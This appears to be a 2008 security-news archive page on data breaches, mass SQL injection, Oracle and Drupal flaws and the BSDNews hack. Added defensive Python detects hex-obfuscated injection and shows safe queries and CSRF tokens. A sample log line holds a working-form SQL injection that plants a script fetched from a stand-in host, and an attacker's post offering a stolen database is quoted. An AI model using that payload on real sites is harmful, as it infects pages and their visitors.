CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts

Archive for April, 2008

Coos County Accounting Firm Stolen Laptop Contained Personal Information

Monday, April 28th, 2008

The theft of a laptop computer owned by an accounting firm has made nearly 500 employees of Coos County and private organizations concerned about identity theft. County officials worry the data may have contained employees’ names, Social Security numbers and other personal information, which had been used in recent audits performed by Hough, MacAdam & Wartnik LLC of North Bend.

According to a Coos Bay Police press log, at approximately 7:28 a.m. on March 5, officers received a report of a woman flagging down Officer Tony Wetmore, identified as 122 in the log, near Coos Bay City Hall. Crystal Albiar, 30, told Wetmore a laptop computer had been stolen from a vehicle, which, Wetmore said, belonged to Albiar. The victim is listed on the press log as Hough, MacAdam & Wartnik. Albiar is a senior accountant at the firm.

Later that day, a letter from the company was sent to clients stating that a serious data security incident may have involved clients’ personal information.

So far there have been no known reports of identity theft from any of the 482 employees notified. The computer has not been found and, according to a letter from the firm, thieves sometimes hold victims’ information for later use.

The CPA said the computer was password protected, as were certain files. Some of the information contained in the programs requires “special knowledge in order to find the personal information inside of the program”.

SwimwearBoutique.com Online Accounts Customer Data Stolen

Sunday, April 27th, 2008

SwimwearBoutique.com recently reported that unauthorized parties illegally gained access to customers’ personal information stored in SwimwearBoutique.com (SWB) online accounts. This unlawful access occurred between March 26, 2008 and March 28, 2008. The information accessed varied and included the names, addresses, email addresses, SWB account passwords, and credit card account numbers of approximately 37 New Hampshire residents who were SWB customers. The criminals also corrupted data maintained by SWB, rendering certain data unreadable and unusable.

This crime was reported to the Dallas office of the United States Secret Service, which is assisting with the investigation. SWB also worked with its existing Internet security provider, McAfee, to determine how the criminals gained access to this information and immediately implemented measures to counter such unlawful conduct.

Notification letters were sent out on April 23, 2008, and affected customers can call 1-866-SWIMWEAR for more information.

Google’s Blogger CAPTCHA Under Automated Registrations Attack

Saturday, April 26th, 2008

In their latest tactic, spammers have targeted Google’s well-known blog publishing system “Blogger”/“Blogspot”, following the previous anti-CAPTCHA attacks on Microsoft’s Live Mail, Google’s Gmail and Microsoft’s Live Hotmail services.

The automated bots are capable not only of signing up and creating Blogger accounts (using spammer-supplied account credentials), but also of using these accounts as redirectors and doorway pages for advertising their products and services. In the current attack, accounts are registered at Blogger using anti-CAPTCHA operations, and a few lines of script or code are used to refresh the account page, directing the user to the actual spam domain.

For spammers, there are a few main advantages to this approach. Sign-up is free, and the accounts can be used as redirectors or doorway pages to the spammers’ domain(s). Spammers include these redirecting accounts in different spam campaigns rather than their actual spam domains, and use this tactic to defeat a range of anti-spam services. These redirecting or doorway-page accounts can also be used in multiple mass-mailing campaigns for subsequent attacks. Another advantage is the difficulty of keeping track of these accounts, as millions of users worldwide use Google’s Blogger services on a regular basis.

The entire automated process is built of two stages. First, predefined instructions from the CAPTCHA-breaking host are injected onto the bot-infected (victim’s) machine. The instructions are used as templates, with varying account credentials and spam-domain redirecting script. Second, the bot-infected machine performs its tasks as per the predefined instructions. Spammers are also trying to improve their anti-CAPTCHA techniques, and the results of the validation checks they perform are sent to their email addresses.

These accounts could be used by the spammers at any time for a variety of social-engineering attacks, a trend that has been increasingly common with various popular Web 2.0 sites.

Tapes With Over 2 Million Records Stolen From University of Miami

Friday, April 25th, 2008

A private off-site storage company used by the University of Miami has notified the University that a container carrying computer back-up tapes of patient information was stolen. The tapes were in a transport case that was stolen from a vehicle contracted by the storage company on March 17 in downtown Coral Gables, the company reported. The victims are more than 2 million medical patients who visited university medical facilities since January 1st, 1999. The types of lost data include names, addresses, Social Security numbers, health information, credit card and other financial information.

Jacqueline Menendez, vice president of communications at the university, said a vehicle used by Archive America Ltd. to transport the patient data was broken into in downtown Coral Gables, Fla., on March 17. The university posted an alert about the incident on April 17, a full month after the backup tapes were stolen. Archive America waited 48 hours before finally notifying the university on Mar. 19 about the break-in and theft.

In a statement, Doctor Pascal J. Goldschmidt, senior vice president for medical affairs and dean of the University of Miami Miller School of Medicine, said, “Even though I am confident that our patients’ data is safe, we felt that in the best interest of the physician-patient relationship we should be transparent in this matter.”

Since the incident, Menendez said that the university has temporarily stopped transporting backup data off-site. “At this point, we’re not transporting anything until we conduct our own internal evaluation of the incident and see if there’s anything that could have been done differently or better”.

Coral Gables law enforcement officials, who are investigating the incident, have informed the school that it was likely a “random theft”. Law enforcement is investigating the incident as one of a series of petty thefts in the area.

UM says it will notify by mail the 47,000 patients whose records may have included credit card or other financial information.

After learning about the data breach, the university contacted local computer forensics companies to see if data on a similar set of backup tapes could be accessed.

The University has established a call center at 1-866-628-4492 for questions and help.

Department of Homeland Security Website Hacked During Mass Web Attacks

Friday, April 25th, 2008

The mass infection that’s injecting attack code into hundreds of thousands of reputable web pages has infiltrated the website of the Department of Homeland Security.

This latest attack is notable for its ability to infect huge numbers of pages using only a single string of text. At time of writing, Google searches showed almost 560,000 pages containing the infection string, though the exact number changes almost constantly. As the screenshot below shows, even the Department of Homeland Security, which is responsible for protecting US infrastructure against cyber attacks, wasn’t immune. Other hacked sites include those belonging to the United Nations and the UK Civil Service.

The attack causes infected sites to redirect visitors to destinations that attempt to install malware on vulnerable machines. At time of writing, the malicious payloads attacked vulnerabilities that had already been patched. In any case, all three of the redirection sites were down, possibly because they were unable to handle the demand. But should the attackers get their hands on a newer exploit - say, one targeting a zero-day vulnerability in QuickTime - it would be relatively easy for them to swap out the payload.

One reason the infection has spread so widely is that the attackers have managed to find a single attack string that seems to work on tens of thousands of different sites. The script is also notable for its ability to slip past web application defenses. The SQL query is mostly made up of hex-encoded text, allowing it to obscure itself, at least from applications backed by Microsoft SQL Server. MySQL and PostgreSQL are less easily fooled, according to researcher Ronald van den Heetkamp.

Sites are getting hacked because they fail to sanitize user-supplied data. So far the Department of Homeland Security has not commented on the issue.

Do not visit the infected website addresses shown in this article or in Google search results.
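As an added illustration (not from the original article), the following Python detection check shows how a keyword-only filter is blinded by the hex obfuscation described above, and how normalising a request before matching (URL-decoding it, then decoding any 0x… literal, which for Microsoft SQL Server NVARCHAR payloads is UTF-16LE) restores visibility. The log lines, site paths and the statement hidden in the hex literal are all constructed for the example and are not the real attack string.

```python
import re
from urllib.parse import unquote_plus

# Keywords that should never appear in a parameter meant to carry a record id
# or a search term. Matching is done on upper-cased text.
SQL_KEYWORDS = ("DECLARE", "CAST(", "EXEC(", "UPDATE ", "INSERT ", "DROP ", "<SCRIPT")
HEX_LITERAL = re.compile(r"0x([0-9a-f]{8,})", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_hex_literal(hex_digits):
    """Turn the digits of a 0x... literal back into text.

    NVARCHAR payloads on Microsoft SQL Server are UTF-16LE, which for ASCII
    content shows up as a zero high byte after every character."""
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if raw and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def inspect_request(log_line):
    """Return (flagged, raw_hits, decoded_hits) for one access-log line.

    raw_hits are keywords visible after URL-decoding alone; decoded_hits are
    keywords that only appear once embedded hex literals are decoded."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return False, [], []
    url = unquote_plus(m.group(1))
    upper = url.upper()
    raw_hits = [k for k in SQL_KEYWORDS if k in upper]
    decoded_hits = []
    for digits in HEX_LITERAL.findall(url):
        text = decode_hex_literal(digits).upper()
        decoded_hits += [k for k in SQL_KEYWORDS if k in text and k not in decoded_hits]
    return bool(raw_hits or decoded_hits), raw_hits, decoded_hits


def flagged_lines(lines):
    """Indexes of lines worth an analyst's attention, with their hits."""
    out = []
    for i, line in enumerate(lines):
        flagged, raw_hits, decoded_hits = inspect_request(line)
        if flagged:
            out.append((i, raw_hits, decoded_hits))
    return out


# Constructed sample data (not from the article). The third line carries the
# injected statement inside a hex literal, built here so the encoding is exact.
INNER_SQL = "UPDATE pages SET body=body+'<script src=\"http://example.invalid/x.js\"></script>'"
HEX_PAYLOAD = "0x" + INNER_SQL.encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Apr/2008:10:01:02 +0000] "GET /news.asp?id=17 HTTP/1.1" 200 5120',
    '10.0.0.6 - - [25/Apr/2008:10:01:09 +0000] "GET /search.asp?q=quicktime+patch HTTP/1.1" 200 2210',
    '10.0.0.7 - - [25/Apr/2008:10:02:33 +0000] "GET /news.asp?id=17;DECLARE%20@s%20NVARCHAR(4000);'
    'SET%20@s=CAST(' + HEX_PAYLOAD + '%20AS%20NVARCHAR(4000));EXEC(@s);-- HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for idx, raw_hits, decoded_hits in flagged_lines(SAMPLE_LOG):
        print(f"line {idx}: visible={raw_hits} hidden_in_hex={decoded_hits}")
```

The benign lines produce no hits; the third line is caught twice over, once by the visible DECLARE/CAST/EXEC scaffolding and again by the UPDATE and script tag that only exist inside the decoded literal, which is the part a filter that never decodes hex would miss.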

34,000 Customers’ Bank Details On Stolen Boots Backup Tape

Friday, April 25th, 2008

Personal details of thousands of customers of Boots Dental Plan (including Boots UK Limited and Medisure) have been stolen after a courier car was broken into in Bristol. The high street chemist chain has today admitted losing 27,000 customer records and 7,000 employees’ details. The information included bank account details, as well as names and addresses. Officials claimed it was “highly unlikely” these could be accessed.

Boots and Medisure, who administer the plan for the company, said all customers had been informed. Boots said in a statement: “We would like to reassure our Boots Dental Plan customers that because of the type of data tape that was stolen and the way the information was stored it is highly unlikely that any personal data could be accessed or misused.”

The tapes were taken from the car of a subcontracted data security company in Bristol on 3 April, 2008. The data is described as “technically complicated” and only accessible with specialist IT equipment and software. Boots declined to name the courier company.

Medisure added the information was not stored on standard software or CDs and could not be used on any home-style PC or laptop. Medisure did not say whether the data was encrypted.

“Reviewing this incident closely with the Police, they consider this to be an opportunist theft rather than a planned operation,” Medisure said in the letter. Avon and Somerset Police said they were investigating the theft from a car on St Thomas Street.

New Lateral SQL Injection Method To Hack Oracle Database

Friday, April 25th, 2008

A new type of attack against Oracle databases, called lateral SQL injection, could be used to gain database administrator privileges on an Oracle server in order to change or delete data or even install software.

Security researcher David Litchfield first disclosed this type of attack at the Black Hat Washington conference last February, but last Thursday he published a paper with the technical details. Litchfield’s attack targets PL/SQL (Procedural Language/SQL), the programming language used by Oracle developers.

In a SQL injection, attackers create specially crafted search terms that trick the database into running SQL commands. Previously, security experts thought that SQL injections would work only if the attacker was inputting character strings into the database, but Litchfield has shown that the attack can also work through other data types, namely the date and number data types.

Litchfield wasn’t sure how widespread lateral SQL injection vulnerabilities are, but he thinks the attack could cause real damage in some scenarios. “If you happen to be using Oracle and you write your own applications on it, then yes, you could be writing vulnerable code,” he said. “The sky is not falling … but it’s certainly something that people should be made aware of.”

Database programmers should review their code to be sure it checks that all of the data it processes is legitimate and does not contain injected SQL commands.
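Added example, neither Litchfield’s code nor Oracle’s: a Python routine that applies the advice above. It treats every incoming value as untrusted text until it has been parsed into a number or a date with a strict format, then hands the typed value to the database as a bind variable; sqlite3 stands in for Oracle because it ships with Python, and the table, its rows and the `sql_literal` helper are assumptions made for the illustration.

```python
import re
import sqlite3
from datetime import date, datetime

# Integer ids only: no operators, no hex prefix, no exponent, nothing else.
NUMBER_RE = re.compile(r"-?\d{1,18}")


class RejectedInput(ValueError):
    """Raised for anything that is not a canonical number or ISO date."""


def parse_number(text):
    """Accept '17' or ' 17 '; reject '17 OR 1=1', '0x11', '1e3'."""
    cleaned = text.strip()
    if not NUMBER_RE.fullmatch(cleaned):
        raise RejectedInput(f"not a number: {text!r}")
    return int(cleaned)


def parse_date(text):
    """Accept only YYYY-MM-DD; strptime rejects trailing characters."""
    try:
        return datetime.strptime(text.strip(), "%Y-%m-%d").date()
    except ValueError:
        raise RejectedInput(f"not an ISO date: {text!r}") from None


def sql_literal(value):
    """For the rare dynamic-SQL case where a bind variable cannot be used:
    render a value that has *already* been typed, in a fixed format chosen by
    the application, rather than letting the database convert it implicitly."""
    if isinstance(value, bool) or not isinstance(value, (int, date)):
        raise TypeError("only typed numbers and dates are rendered")
    if isinstance(value, int):
        return str(value)
    return "DATE '" + value.isoformat() + "'"


def build_demo_db():
    """Constructed in-memory table; sqlite3 stands in for Oracle here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER, customer_id INTEGER, placed TEXT, total REAL)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)", [
        (1, 17, "2008-03-01", 40.0),
        (2, 17, "2008-04-20", 75.5),
        (3, 23, "2008-04-21", 12.0),
    ])
    return conn


def orders_since(conn, customer_text, since_text):
    """Type both parameters first, then query with bind variables only."""
    customer_id = parse_number(customer_text)
    since = parse_date(since_text)
    return conn.execute(
        "SELECT id, total FROM orders WHERE customer_id = ? AND placed >= ? ORDER BY id",
        (customer_id, since.isoformat()),
    ).fetchall()


def is_rejected(conn, customer_text, since_text):
    """True when the inputs never reach the database."""
    try:
        orders_since(conn, customer_text, since_text)
    except RejectedInput:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    print(orders_since(db, "17", "2008-04-01"))
    for bad in (("17 OR 1=1", "2008-04-01"), ("17", "2008-04-01'--")):
        print(bad, "rejected" if is_rejected(db, *bad) else "accepted")
```

The point of `sql_literal` is that a value being a number or a date is not by itself a guarantee about the text it turns into; if the application must build SQL text, it should render the typed value in a format it controls rather than rely on the database’s own conversion.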

Oracle did not comment on this issue.

Southern Connecticut State University Warns Of Data Breach After Web Defacement

Friday, April 25th, 2008

Southern Connecticut State University is notifying 11,000 current and former students that their Social Security numbers may have been compromised two weeks after discovering that its website had been used by hackers to spam fancy wedding rings.

The personal data was in a file on the university’s web server, which was accessed by criminals who were using the university’s site as part of a spam operation. The hackers were using the university’s server to host their own web pages.

Pages on the university’s site contained ads for diamond rings, Viagra and Cialis. After noticing the ads on April 9, IT staff discovered the file containing the sensitive information. During the security review that followed the incident, the file was found there and it wasn’t properly secured, so it could have been targeted by someone. The file contained names, addresses and Social Security numbers of students who had registered to graduate from the school, dating back to 2002.

The university believes that the hackers came from outside the U.S., and it is working with the Connecticut attorney general’s office to investigate.

Students affected by the breach are being offered identity protection services for two years.

The university’s attack does not appear to be connected with recent widespread SQL injection attacks. In those hacks, attackers had been using the websites to attack other computers and infect them with malware. With Southern Connecticut, the motive appears to have been tied to spam.

Drupal Multiple XSS and Request Forgery Vulnerabilities

Friday, April 25th, 2008

The affected Drupal modules (listed below) are prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input. The Internationalization module is also prone to cross-site request forgery attacks while performing node translations.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can exploit the cross-site request forgery issue by tricking a victim into issuing a specially crafted HTTP request designed to perform some action on the attacker’s behalf using the victim’s currently active session. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The vendor has released updates.
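Added example (not Drupal’s code, nor the modules’ patches): a minimal Python illustration of the two fixes the advisory implies, output escaping for the cross-site scripting side and a per-session, per-form token check for the request forgery side. The session id, the form name `node-translate`, the site secret and the handler are all constructed for the example.

```python
import hashlib
import hmac
import html

# Constructed site secret for the example; a real deployment generates one
# at install time and keeps it server-side, never sending it to the browser.
SITE_SECRET = b"constructed-example-secret-do-not-reuse"


def csrf_token(session_id, form_id, secret=SITE_SECRET):
    """A token bound to one session *and* one form, so a token lifted from
    another session, or issued for a different form, will not validate."""
    msg = f"{session_id}:{form_id}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def token_is_valid(session_id, form_id, presented, secret=SITE_SECRET):
    """Constant-time comparison; a missing token is simply invalid."""
    expected = csrf_token(session_id, form_id, secret)
    return hmac.compare_digest(expected, presented or "")


def render_title(user_supplied):
    """Output escaping, the fix for the XSS side: < > & and quotes become
    entities, so user text can never close the tag it is printed into."""
    return "<h2>" + html.escape(user_supplied, quote=True) + "</h2>"


def handle_translate_node(session_id, form):
    """Handler for a hypothetical 'translate node' form. `form` is the dict of
    posted fields; returns (HTTP status, response body)."""
    if not token_is_valid(session_id, "node-translate", form.get("token")):
        return 403, "invalid or missing form token"
    node_id = html.escape(form.get("nid", ""), quote=True)
    return 200, f"translated node {node_id}: " + render_title(form.get("title", ""))


if __name__ == "__main__":
    sid = "constructed-session-id"
    token = csrf_token(sid, "node-translate")
    print(handle_translate_node(sid, {"nid": "42", "title": "<b>Hi</b>", "token": token}))
    print(handle_translate_node(sid, {"nid": "42", "title": "<b>Hi</b>"}))
```

A request that arrives via a link the victim was tricked into following carries the victim’s session cookie but not a token for this session and this form, so it is refused before any translation happens; the same handler escapes whatever title it echoes back, so script in the input is rendered as text.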

Vulnerable:

Drupal Localizer 5.x 3.3
Drupal Localizer 5.x 2.x-dev
Drupal Localizer 5.x 1.10
Drupal Internationalization 6.x 1.x-dev
Drupal Internationalization 5.x 2.2
Drupal Internationalization 5.x 1.x-dev

Not Vulnerable:

Drupal Localizer 5.x 3.4
Drupal Localizer 5.x 2.1
Drupal Localizer 5.x 1.11
Drupal Internationalization 6.x 1.0-beta1
Drupal Internationalization 5.x 2.3
Drupal Internationalization 5.x 1.1

BSDNews.com Hacked And Members Information Publicly Exposed

Friday, April 25th, 2008

The BSDNews.com website has been compromised through an exploit of a file named “bottom.php3” that was used by the site. The attacker was able to access and download user account information.

The following message, posted by the attacker, appeared in the forum:

Hi all, maybe some of you saw that bsdnews.com is/was offline.
I hacked their database, with an exploit found by myself.
I tried to submit to milw0rm, but they don't accept exploits of .php3.
bottom.php3, this file was the vulnerability.
LOL, ok.. But I have their user database.
I don't want to waste my time to check the whole thing..
first word is username, second word is password, third word is email address.
By some lines the password, email is NULL.
Do what you want to do with it..
Please, if u think I didn't hack it, search forums/google, you don't find anything
THIS IS MY FIRST RELEASE HERE!
I kept everything as I got it so there can be info that is useful
uploaded at my host